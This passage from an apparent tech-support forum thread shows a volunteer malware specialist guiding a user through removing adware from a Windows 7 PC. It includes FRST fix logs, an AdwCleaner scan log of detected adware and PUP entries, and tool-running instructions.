    C:\Users\ADMIN\AppData\Local\Don-Sing.tst => moved successfully
    C:\Users\ADMIN\AppData\Local\installer.dat => moved successfully
    C:\Users\ADMIN\AppData\Local\noah.dat => moved successfully
    C:\Users\ADMIN\AppData\Local\lobby.dat => moved successfully
    C:\Users\ADMIN\AppData\Local\GreenZuntouch.tst => moved successfully
    C:\Users\ADMIN\AppData\Local\Config.xml => moved successfully
    C:\Users\ADMIN\AppData\Local\ApplicationHosting.dat => moved successfully
    C:\Users\ADMIN\AppData\Local\Main.dat => moved successfully
    C:\Users\ADMIN\AppData\Local\InstallationConfiguration.xml => moved successfully
    C:\Users\ADMIN\AppData\Local\md.xml => moved successfully
    C:\ProgramData\CloudPrinter => moved successfully
    C:\Users\ADMIN\AppData\Roaming\Beguk => moved successfully
    C:\Users\ADMIN\AppData\Roaming\Gisigo => moved successfully
    "C:\Windows\Tasks\{67B56D17-7F1F-A4E3-5640-5A99ED1D0072}.job" => not found
    "C:\Windows\Tasks\Yahoo! Powered rasin.job" => not found
    "C:\ProgramData\{C7A902CA-4DEB-880C-CB2D-164E516F9D80}" => not found
    "C:\Windows\Tasks\{633E5C42-23C4-ABE8-66E1-2266DBE038D4}.job" => not found
    "C:\Users\ADMIN\AppData\Roaming\appdata.dat" => not found
    C:\Users\ADMIN\AppData\Roaming\Babesog => moved successfully
    C:\Users\ADMIN\AppData\Roaming\Bopirolifeb => moved successfully
    C:\Users\ADMIN\AppData\Roaming\Fobacapekilu => moved successfully
    C:\Users\ADMIN\AppData\Roaming\Fubarum => moved successfully
    C:\Users\ADMIN\AppData\Roaming\Gerepokuf => moved successfully
    C:\Users\ADMIN\AppData\Roaming\Koceramo => moved successfully
    C:\Users\ADMIN\AppData\Roaming\Lepicufip => moved successfully
    C:\Users\ADMIN\AppData\Roaming\lsa64.log => moved successfully
    C:\Users\ADMIN\AppData\Roaming\Mifebe => moved successfully
    C:\Users\ADMIN\AppData\Roaming\Mumimehohil => moved successfully
    C:\Users\ADMIN\AppData\Roaming\Netab => moved successfully
    C:\Users\ADMIN\AppData\Roaming\Nocekerotacu => moved successfully
    C:\Users\ADMIN\AppData\Roaming\Racadebul => moved successfully
    C:\Users\ADMIN\AppData\Roaming\Rolecunotif => moved successfully
    C:\Users\ADMIN\AppData\Roaming\Sokacapo => moved successfully
    C:\Users\ADMIN\AppData\Roaming\Suhec => moved successfully
    C:\Users\ADMIN\AppData\Local\Autosofted License.txt => moved successfully
    "C:\Users\ADMIN\AppData\Local\Main.dat" => not found
    C:\Users\ADMIN\AppData\Local\uninstall_temp.ico => moved successfully
    C:\Users\ADMIN\AppData\Local\updater.log => moved successfully
    C:\Users\ADMIN\AppData\Local\UserProducts.xml => moved successfully
    HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00asw => removed successfully
    HKLM\Software\Classes\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => not found
    HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avast => removed successfully
    HKLM\Software\Classes\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => not found
    C:\Users\ADMIN\Documents\Local Disk (C => ":).exe" ADS removed successfully
    "C:\Windows\windefender.exe" => not found
    c:\users\admin\appdata\local\chromium => moved successfully
    "C:\Program Files (x86)\mystarttb" => not found
    C:\Users\ADMIN\AppData\Roaming\633E5C~1 => moved successfully
    C:\Users\ADMIN\AppData\Roaming\Mefifi => moved successfully
    C:\Users\ADMIN\AppData\Roaming\Microsoft\Windows\cuebedbh => moved successfully
    "C:\Users\ADMIN\AppData\Roaming\633e5c4223c4abe866e12266dbe038d4" => not found
    C:\Program Files\NVIDIA Corporation\MAK7CBDCE4NDDPY => moved successfully
    "VirusTotal: C:\Users\ADMIN\AppData\Local\Programs\Opera\launcher.exe" => not found
    VirusTotal: C:\Users\ADMIN\AppData\Roaming\WB.CFG => https://www.virustotal.com/file/4ac...9bfa12873738c5beec0caa78/analysis/1562773906/
    "VirusTotal: C:\Users\ADMIN\Documents\Local Disk (C:).exe" => not found

    ========= ipconfig /flushdns =========


    Windows IP Configuration

    Successfully flushed the DNS Resolver Cache.

    ========= End of CMD: =========


    ========= ipconfig /release =========


    Windows IP Configuration


    Ethernet adapter Local Area Connection:

    Connection-specific DNS Suffix . :
    Link-local IPv6 Address . . . . . : fe80::69e7:c5cc:acb2:f06d%11
    Default Gateway . . . . . . . . . : fe80::1%11

    Tunnel adapter isatap.{644D5D4C-C575-4567-B554-70E1BFCA99F2}:

    Media State . . . . . . . . . . . : Media disconnected
    Connection-specific DNS Suffix . :

    Tunnel adapter Teredo Tunneling Pseudo-Interface:

    Media State . . . . . . . . . . . : Media disconnected
    Connection-specific DNS Suffix . :

    ========= End of CMD: =========


    ========= ipconfig /renew =========


    Windows IP Configuration


    Ethernet adapter Local Area Connection:

    Connection-specific DNS Suffix . :
    Link-local IPv6 Address . . . . . : fe80::69e7:c5cc:acb2:f06d%11
    IPv4 Address. . . . . . . . . . . : 192.168.100.5
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . : fe80::1%11
    192.168.100.1

    Tunnel adapter Teredo Tunneling Pseudo-Interface:

    Media State . . . . . . . . . . . : Media disconnected
    Connection-specific DNS Suffix . :

    ========= End of CMD: =========


    ========= netsh advfirewall reset =========

    Ok.


    ========= End of CMD: =========


    ========= netsh advfirewall set allprofiles state ON =========

    Ok.


    ========= End of CMD: =========


    ========= netsh winsock reset catalog =========


    Sucessfully reset the Winsock Catalog.
    You must restart the computer in order to complete the reset.


    ========= End of CMD: =========


    ========= netsh int ip reset c:\resetlog.txt =========

    Reseting Global, OK!
    Reseting Interface, OK!
    Reseting Unicast Address, OK!
    Reseting Route, OK!
    Restart the computer to complete this action.


    ========= End of CMD: =========


    ========= netsh int ipv4 reset =========

    There's no user specified settings to be reset.


    ========= End of CMD: =========


    ========= netsh int ipv6 reset =========

    There's no user specified settings to be reset.


    ========= End of CMD: =========


    ========= RemoveProxy: =========

    "HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => removed successfully
    "HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => removed successfully
    "HKU\S-1-5-21-3161437104-263828448-1275724104-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => removed successfully
    "HKU\S-1-5-21-3161437104-263828448-1275724104-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => removed successfully


    ========= End of RemoveProxy: =========


    ========= Bitsadmin /Reset /Allusers =========


    BITSADMIN version 3.0 [ 7.5.7600 ]
    BITS administration utility.
    (C) Copyright 2000-2006 Microsoft Corp.

    BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
    Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

    {28B6AE71-D41C-4954-9AED-305CFED7645A} canceled.
    1 out of 1 jobs canceled.

    ========= End of CMD: =========


    =========== EmptyTemp: ==========

    BITS transfer queue => 8388608 B
    DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 8459381 B
    Java, Flash, Steam htmlcache => 21756409 B
    Windows/system/drivers => 100775466 B
    Edge => 0 B
    Chrome => 196143402 B
    Firefox => 5815746 B
    Opera => 20086385 B

    Temp, IE cache, history, cookies, recent:
    Users => 0 B
    Default => 1926 B
    Public => 0 B
    ProgramData => 0 B
    systemprofile => 5535683 B
    systemprofile32 => 1157291 B
    LocalService => 66708 B
    NetworkService => 275808 B
    ADMIN => 3308001920 B
    children => 87978379 B

    RecycleBin => 0 B
    EmptyTemp: => 3.5 GB temporary data Removed.

    ================================


    The system needed a reboot.

    ==== End of Fixlog 21:25:20 ====
     
  8. nekoshoyo

    nekoshoyo Thread Starter

    Joined:
    Jul 9, 2019
    Messages:
    12
    Ive deleted all the programs you mentioned except youtubeadblock, when I try to, this pops up:

    [​IMG]
    (heres the link just in case image doesnt show up: https://prnt.sc/od7c5z)

    The "managed by your organization" thing is FINALLY gone from google, thank you so much! No ads are popping up, and everything seems fine. The computer started up smoothly as well, no complications there. Windows security system is back up and working. Earlier I could not run it because of "group administer policy" or something. I have no idea about those registry entries (I'm a teenage girl with knowledge whatsoever about any of the technical matters to be honest). But seems like everything is back to normal!! Thank you so much :D

    And yea lol, I've told my brother to not download anything without my permission from now on. He feels guilty enough, so that's good. Again, thank you :)
     
  9. iMacg3

    iMacg3 Malware Specialist

    Joined:
    Nov 3, 2018
    Messages:
    561
    Hi nekoshoyo,

    Some remnants to clean up:

    ---------------------------------------------------
    Farbar Recovery Scan Tool - Fix

    NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

    Download the attached file and save it to the same location FRST / FRST64 is saved.
    • Start FRST / FRST64 with Administrator privileges.
    • Press the Fix button.
    • When finished, a log file (Fixlog.txt) will pop up/saved in the same location the tool was run from.
    Please copy and paste its contents in your next reply.

    ---------------------------------------------------
    AdwCleaner

    Download AdwCleaner and save it to your desktop.
    • Right-click on the AdwCleaner icon and select Run as Administrator
    • Accept the EULA (I agree), then click on Scan.
    • When the scan is complete, click View Scan Log File. (Don't click the Clean and Repair button yet)
    • The scan log will open in Notepad.
    • Copy and paste its contents into your next reply.
    • Note: The log is also saved to C:\AdwCleaner\Logs\AdwCleaner[Sxx].txt

    ---------------------------------------------------

    In your next reply, please include:
    • Fixlog.txt
    • AdwCleaner[Sxx].txt
     

    Attached Files:

  10. nekoshoyo

    nekoshoyo Thread Starter

    Joined:
    Jul 9, 2019
    Messages:
    12
    Hey! Sorry for the delay,

    Heres the fixlog.txt:

    Fix result of Farbar Recovery Scan Tool (x64) Version: 10-07-2019
    Ran by ADMIN (12-07-2019 19:51:28) Run:2
    Running from C:\Users\ADMIN\Desktop
    Loaded Profiles: ADMIN (Available Profiles: ADMIN & children)
    Boot Mode: Normal
    ==============================================

    fixlist content:
    *****************
    start
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Policies\system: [LogonHoursAction] 2
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Policies\system: [DontDisplayLogonHoursWarnings] 1
    Deletekey: HKLM\Software\WOW6432node\Microsoft\Windows\Currentversion\Uninstall\1655C0CA-7AE7-4012-8502-970C8675E5F8
    Reboot:
    End
    *****************

    "HKU\S-1-5-21-3161437104-263828448-1275724104-1000\Software\Microsoft\Windows\CurrentVersion\Policies\system\\LogonHoursAction" => not found
    "HKU\S-1-5-21-3161437104-263828448-1275724104-1000\Software\Microsoft\Windows\CurrentVersion\Policies\system\\DontDisplayLogonHoursWarnings" => not found
    HKLM\Software\WOW6432node\Microsoft\Windows\Currentversion\Uninstall\1655C0CA-7AE7-4012-8502-970C8675E5F8 => removed successfully


    The system needed a reboot.

    ==== End of Fixlog 19:51:28 ====

    And heres the scan result:

    # -------------------------------
    # Malwarebytes AdwCleaner 7.3.0.0
    # -------------------------------
    # Build: 04-04-2019
    # Database: 2019-06-28.1 (Cloud)
    # Support: https://www.malwarebytes.com/support
    #
    # -------------------------------
    # Mode: Scan
    # -------------------------------
    # Start: 07-12-2019
    # Duration: 00:00:17
    # OS: Windows 7 Ultimate
    # Scanned: 27557
    # Detected: 82


    ***** [ Services ] *****

    No malicious services found.

    ***** [ Folders ] *****

    PUP.Optional.ByteFence C:\ProgramData\ByteFence
    PUP.Optional.Legacy C:\ProgramData\EmailNotifier
    PUP.Optional.Legacy C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WajaNEn
    PUP.Optional.Legacy C:\ProgramData\Tencent
    PUP.Optional.Legacy C:\Users\ADMIN\AppData\Local\YSearchUtil
    PUP.Optional.Legacy C:\Users\ADMIN\AppData\Roaming\RPEng
    PUP.Optional.Legacy C:\Users\ADMIN\AppData\Roaming\Tencent
    PUP.Optional.Legacy C:\Windows\SysWOW64\config\systemprofile\AppData\Local\YSearchUtil
    PUP.Optional.Legacy C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent
    PUP.Optional.MyStartTB.ShrtCln C:\Users\children\AppData\LocalLow\mystarttb
    PUP.Optional.OnlineIO C:\Windows\Installer\{5266F634-7B7D-4537-BDDC-98DD6CFCBAA1}

    ***** [ Files ] *****

    PUP.Optional.Legacy C:\Users\children\AppData\Roaming\Mozilla\Firefox\Profiles\9sw0nvn7.default\searchplugins\findit.xml

    ***** [ DLL ] *****

    No malicious DLLs found.

    ***** [ WMI ] *****

    No malicious WMI found.

    ***** [ Shortcuts ] *****

    PUP.Optional.SafeFinder C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
    PUP.Optional.SafeFinder C:\Users\ADMIN\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk
    PUP.Optional.SafeFinder C:\Users\ADMIN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
    PUP.Optional.SafeFinder C:\Users\ADMIN\Desktop\Internet Explorer.lnk
    PUP.Optional.SafeFinder C:\Users\children\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
    PUP.Optional.SafeFinder C:\Users\children\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk
    PUP.Optional.SafeFinder C:\Users\children\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
    PUP.Optional.SafeFinder C:\Users\children\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
    PUP.Optional.SafeFinder C:\Users\children\Desktop\Google Chrome.lnk

    ***** [ Tasks ] *****

    No malicious tasks found.

    ***** [ Registry ] *****

    Adware.ICLoader HKLM\SOFTWARE\MICROSOFT\Speedycar
    Adware.ICLoader HKLM\Software\MICROSOFT\TechnologyDesktopnew
    Adware.Linkury HKCU\Software\mtQuoteex
    Adware.Linkury HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\Quoteex.exe
    Adware.Linkury HKLM\Software\Wow6432Node\\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\Quoteex.exe
    Adware.Linkury HKLM\Software\Wow6432Node\\MICROSOFT\WINDOWS NT\CURRENTVERSION\SILENTPROCESSEXIT\Quoteex.exe
    Adware.Linkury HKLM\Software\Wow6432Node\mtQuoteex
    Adware.OnlineIO HKLM\Software\Wow6432Node\Microleaves
    PUP.Optional.ByteFence HKLM\SOFTWARE\Microsoft\RADAR\HeapLeakDetection\DiagnosedApplications\ByteFence.exe
    PUP.Optional.ByteFence HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Reason\ReasonByteFence
    PUP.Optional.ByteFence HKLM\Software\Wow6432Node\\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION|ByteFence.exe
    PUP.Optional.ByteFence HKU\.DEFAULT\Software\ByteFence
    PUP.Optional.ByteFence HKU\S-1-5-18\Software\ByteFence
    PUP.Optional.DNSUnlocker HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\26D9E607FFF0C58C7844B47FF8B6E079E5A2220E
    PUP.Optional.DNSUnlocker HKLM\Software\Wow6432Node\\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\26D9E607FFF0C58C7844B47FF8B6E079E5A2220E
    PUP.Optional.Dreamtrips HKCU\Software\DreamTrips
    PUP.Optional.DriverPack HKCU\Software\drpsu
    PUP.Optional.Foldershare HKLM\Software\foldershare
    PUP.Optional.Glupteba HKCU\Software\EpicNet Inc.
    PUP.Optional.Homeville HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Homeville Launcher
    PUP.Optional.InstallCore HKCU\Software\csastats
    PUP.Optional.Legacy HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{CCB24E92-62C4-4C53-95D2-65F9EED476BC}
    PUP.Optional.Legacy HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CCB24E92-62C4-4C53-95D2-65F9EED476BC}
    PUP.Optional.Legacy HKLM\Software\Classes\Interface\{47A1DF02-BCE4-40C3-AE47-E3EA09A65E4A}
    PUP.Optional.Legacy HKLM\Software\Classes\Interface\{FA7B2795-C0C8-4A58-8672-3F8D80CC0270}
    PUP.Optional.Legacy HKLM\Software\Classes\METNSD
    PUP.Optional.Legacy HKLM\Software\Classes\TypeLib\{1112F282-7099-4624-A439-DB29D6551552}
    PUP.Optional.Legacy HKLM\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{607B689F-7600-45E4-B8E5-887F72DAB15C}
    PUP.Optional.Legacy HKLM\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0D4A4BC-F7CD-436E-B1FA-25637BA0F5BE}
    PUP.Optional.Legacy HKLM\Software\Microsoft\Internet Explorer\SearchScopes|DoNotAskAgain
    PUP.Optional.Legacy HKLM\Software\WajaNEn
    PUP.Optional.Legacy HKLM\Software\Wow6432Node\Email Notifier
    PUP.Optional.Legacy HKLM\Software\Wow6432Node\WajaNEn
    PUP.Optional.Legacy HKLM\Software\Wow6432Node\\Classes\CLSID\{47A1DF02-BCE4-40C3-AE47-E3EA09A65E4A}
    PUP.Optional.Legacy HKLM\Software\Wow6432Node\\Classes\CLSID\{B853E835-9F24-4F4B-B55C-E554D15CCCD2}
    PUP.Optional.Legacy HKLM\Software\Wow6432Node\\Classes\CLSID\{B9D64D3B-BE75-4FA2-B94A-C4AE772A0146}
    PUP.Optional.Legacy HKLM\Software\Wow6432Node\\Classes\CLSID\{F83D1872-D9FF-47F8-B5A0-49CC51E24EE8}
    PUP.Optional.Legacy HKLM\Software\Wow6432Node\\Classes\Interface\{47A1DF02-BCE4-40C3-AE47-E3EA09A65E4A}
    PUP.Optional.Legacy HKLM\Software\Wow6432Node\\Classes\Interface\{FA7B2795-C0C8-4A58-8672-3F8D80CC0270}
    PUP.Optional.Legacy HKLM\Software\Wow6432Node\\Classes\TypeLib\{1112F282-7099-4624-A439-DB29D6551552}
    PUP.Optional.Legacy HKLM\Software\Wow6432Node\\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{607B689F-7600-45E4-B8E5-887F72DAB15C}
    PUP.Optional.Legacy HKLM\Software\Wow6432Node\\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0D4A4BC-F7CD-436E-B1FA-25637BA0F5BE}
    PUP.Optional.Legacy HKLM\System\CurrentControlSet\Services\EventLog\Application\Application Hosting
    PUP.Optional.Linkury.ACMB1 HKCU\Environment|SNP
    PUP.Optional.Microleaves HKLM\Software\Classes\Installer\Features\436F6625D7B77354DBCD89DDC6CFAB1A
    PUP.Optional.Microleaves HKLM\Software\Classes\Installer\Products\436F6625D7B77354DBCD89DDC6CFAB1A
    PUP.Optional.Microleaves HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\436F6625D7B77354DBCD89DDC6CFAB1A
    PUP.Optional.Microleaves HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{5266F634-7B7D-4537-BDDC-98DD6CFCBAA1}
    PUP.Optional.Microleaves HKU\.DEFAULT\Software\Caphyon\Advanced Updater\{F039D4A9-14D3-4425-A4FA-F2F9D5B0E014}
    PUP.Optional.Microleaves HKU\S-1-5-18\Software\Caphyon\Advanced Updater\{F039D4A9-14D3-4425-A4FA-F2F9D5B0E014}
    PUP.Optional.MyStart HKLM\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A2159D33-3CE2-401B-8967-1B270628A311}
    PUP.Optional.MyStart HKLM\Software\Wow6432Node\\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A2159D33-3CE2-401B-8967-1B270628A311}
    PUP.Optional.MyStartTB.ShrtCln HKCU\Software\AppDataLow\Software\mystarttb
    PUP.Optional.MyStartTB.ShrtCln HKLM\Software\Wow6432Node\mystarttb
    PUP.Optional.ProductSetup.A HKCU\Software\PRODUCTSETUP
    PUP.Optional.SearchManager HKCU\Software\ProductSetup\Uninstall\0B2U2Z1P0F1P1G1R1P1V0A1Q1Q0O1G
    PUP.Optional.SearchManager HKCU\Software\ProductSetup\Uninstall\0S1P1T1C1R1MtT0P1C1F2X1L1Q1P1QtT1S2UtT0Y1T1M1F1F
    PUP.Optional.Wajam HKCU\Software\WajIEnhance

    ***** [ Chromium (and derivatives) ] *****

    PUP.Optional.Legacy MyStart New Tab
    PUP.Optional.Legacy Search and New Tab by Yahoo

    ***** [ Chromium URLs ] *****

    PUP.Optional.SofTonicAssistant Softonic EN

    ***** [ Firefox (and derivatives) ] *****

    No malicious Firefox entries found.

    ***** [ Firefox URLs ] *****

    No malicious Firefox URLs found.



    ########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S00].txt ##########
     
  11. iMacg3

    iMacg3 Malware Specialist

    Joined:
    Nov 3, 2018
    Messages:
    561
    Hi nekoshoyo,

    ---------------------------------------------------
    AdwCleaner - Clean

    • Double-click the AdwCleaner icon to run it.
    • Press the Scan button.
    • When the scan is complete, ensure that all the listed items are checked and click Clean and Repair.
    • Select Clean & Restart Now. AdwCleaner will restart the computer to complete the cleaning process.
    • After the restart, an AdwCleaner window will open. Select View Log File.
    • The scan log will open in Notepad.
    • Copy and paste its contents into your next reply.
    • Note: The log is also saved to C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt

    ---------------------------------------------------
    FRST scan
    • Double-click FRST.exe/FRST64.exe to run it.
    • Press the Scan button.
    • When finished, it will produce logs called FRST.txt and Addition.txt in the same directory the tool was run from.
    • Please copy and paste the logs in your next reply.

    ---------------------------------------------------

    In your next reply, please include:
    • AdwCleaner[Cxx].txt
    • FRST.txt
    • Addition.txt
     
  12. nekoshoyo

    nekoshoyo Thread Starter

    Joined:
    Jul 9, 2019
    Messages:
    12
    FRST.txt (PART 1):

    Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 13-07-2019
    Ran by ADMIN (administrator) on ADMIN-PC (INTEL_ DH61HO__) (15-07-2019 16:39:36)
    Running from C:\Users\ADMIN\Desktop
    Loaded Profiles: ADMIN (Available Profiles: ADMIN & children)
    Platform: Windows 7 Ultimate (X64) Language: English (United States)
    Internet Explorer Version 8 (Default browser: Chrome)
    Boot Mode: Normal
    Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

    ==================== Processes (Whitelisted) =================

    (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

    (Adobe Systems, Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
    (Google Inc -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.34.11\GoogleCrashHandler.exe
    (Google Inc -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.34.11\GoogleCrashHandler64.exe
    (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Huawei Technologies Co., Ltd.) [File not signed] C:\ProgramData\DatacardService\DCSHelper.exe
    (Logitech Inc -> Logitech Inc.) C:\Program Files\Logitech Gaming Software\ArxApplets\Discord\logitechg_discord.exe
    (Logitech Inc -> Logitech Inc.) C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe
    (Logitech Inc -> Logitech Inc.) C:\Program Files\Logitech Gaming Software\LCore.exe
    (Malwarebytes Corporation -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
    (Malwarebytes Corporation -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
    (Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\notepad.exe
    (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
    (NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
    (NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
    (Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
    (Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
    (Skillbrains) [File not signed] C:\Program Files (x86)\Skillbrains\lightshot\5.4.0.35\Lightshot.exe
    (TeamViewer -> TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe

    ==================== Registry (Whitelisted) ===========================

    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

    HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13667032 2014-02-19] (Realtek Semiconductor Corp -> Realtek Semiconductor)
    HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [18727048 2018-10-05] (Logitech Inc -> Logitech Inc.)
    HKLM-x32\...\Run: [Lightshot] => C:\Program Files (x86)\Skillbrains\lightshot\Lightshot.exe [225944 2017-04-11] (OOO Lightshot -> )
    HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [645456 2019-04-01] (Oracle America, Inc. -> Oracle Corporation)
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Run: [Steam] => "E:\steam\steam.exe" -silent
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\Run: [EpicGamesLauncher] => "C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe" -silent
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\MountPoints2: {915ba646-3592-11e8-8a07-eca86b72ed8f} - H:\AutoRun.exe
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\MountPoints2: {915ba64a-3592-11e8-8a07-eca86b72ed8f} - H:\AutoRun.exe
    HKLM\...\Drivers32: [vidc.mjpg] => C:\Windows\system32\bdmjpeg64.dll [75248 2017-01-26] (Bandicam Company -> )
    HKLM\...\Drivers32: [vidc.mpeg] => C:\Windows\system32\bdmpegv64.dll [75272 2017-01-26] (Bandicam Company -> )
    HKLM\...\Drivers32: [msacm.bdmpeg] => C:\Windows\system32\bdmpega64.acm [75784 2017-01-26] (Bandicam Company -> )
    HKLM\...\Drivers32: [vidc.mjpg] => C:\Windows\SysWOW64\bdmjpeg.dll [71152 2017-01-26] (Bandicam Company -> )
    HKLM\...\Drivers32: [vidc.mpeg] => C:\Windows\SysWOW64\bdmpegv.dll [71176 2017-01-26] (Bandicam Company -> )
    HKLM\...\Drivers32: [msacm.bdmpeg] => C:\Windows\SysWOW64\bdmpega.acm [71176 2017-01-26] (Bandicam Company -> )
    HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\75.0.3770.100\Installer\chrmstp.exe [2019-06-22] (Google LLC -> Google LLC)
    HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> "C:\Program Files (x86)\Google\Chrome\Application\57.0.2987.133\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level
    HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{A6EADE66-0000-0000-484E-7E8A45000000}] -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Esl\AiodLite.dll [2018-06-29] (Adobe Systems, Incorporated -> Adobe Systems, Inc.)

    ==================== Scheduled Tasks (Whitelisted) =============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    Task: {05415D0C-CABB-4C68-A583-1908F354E7C0} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
    Task: {0E58AAF5-E621-4095-886F-EED72D34722B} - System32\Tasks\update-S-1-5-21-3161437104-263828448-1275724104-1000 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
